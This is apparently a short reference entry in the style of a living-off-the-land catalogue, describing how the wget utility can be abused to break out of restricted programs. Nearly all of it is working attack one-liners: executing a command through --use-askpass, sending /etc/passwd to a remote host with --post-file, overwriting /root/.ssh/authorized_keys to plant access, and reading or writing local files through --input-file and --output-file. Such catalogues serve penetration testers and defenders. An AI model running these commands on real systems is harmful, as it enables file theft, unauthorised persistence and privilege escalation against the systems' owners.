It can be used to break out from the intended program by running non-interactive system commands.
Can be used to execute any command or file on a system, but without any arguments, and without stdout/stderr. This can be useful if you are able to write an executable to the server beforehand. The example here invokes /sbin/reboot.
wget --use-askpass=/sbin/reboot http://0/It can exfiltrate files on the network.
Send a local file to a remote server in a POST request. Note that the file will be sent as-is.
wget --post-file=/etc/passwd http://0/It can download remote files.
Downloads a remote file via an HTTP GET request and saves it to a specific location.
wget --output-document=/root/.ssh/authorized_keys http://0/It writes data to files, it may be used to do privileged writes or write files outside a restricted file system.
Reads local data and writes the output to a file. This is only suitable for displaying non-binary files, as the output is an error-log.
wget --input-file=/etc/passwd --output-file=/tmp/passwd.txtIt reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
Read local files by importing the file as URIs to be retrieved. The content of the file will be displayed as error messages.
wget --input-file=/etc/passwd http://0/